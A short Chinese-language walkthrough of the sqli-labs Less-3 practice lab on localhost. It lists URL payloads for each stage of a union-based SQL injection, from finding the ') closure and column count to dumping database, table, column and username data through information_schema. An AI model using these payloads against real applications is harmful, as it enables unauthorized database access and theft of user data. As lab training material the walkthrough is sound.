一、输入id,正常显示
http://127.0.0.1/sqli-labs-master/Less-3/?id=1
二、判断数字型还是字符型。1=1和1=2都显示正常,则说明是字符型注入
http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=1
http://127.0.0.1/sqli-labs-master/Less-3/?id=1 and 1=2
三、判断闭合方式
1.尝试单引号,报错
http://127.0.0.1/sqli-labs-master/Less-3/?id=1'
2.尝试添加注释符,报错
http://127.0.0.1/sqli-labs-master/Less-3/?id=1' --+
3.添加注释符后还报错则尝试添加括号,页面正常,则闭合方式为 ')
http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+
四、判断字段数
http://127.0.0.1/sqli-labs-master/Less-3/?id=1') order by 3 --+
五、判断显示位
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 --+
六、爆所有数据库
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
七、爆指定数据库(security)所有表
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
八、爆指定表(users)所有列
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
九、爆指定列(username)所有数据
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,(select group_concat(username) from users),3 --+
over~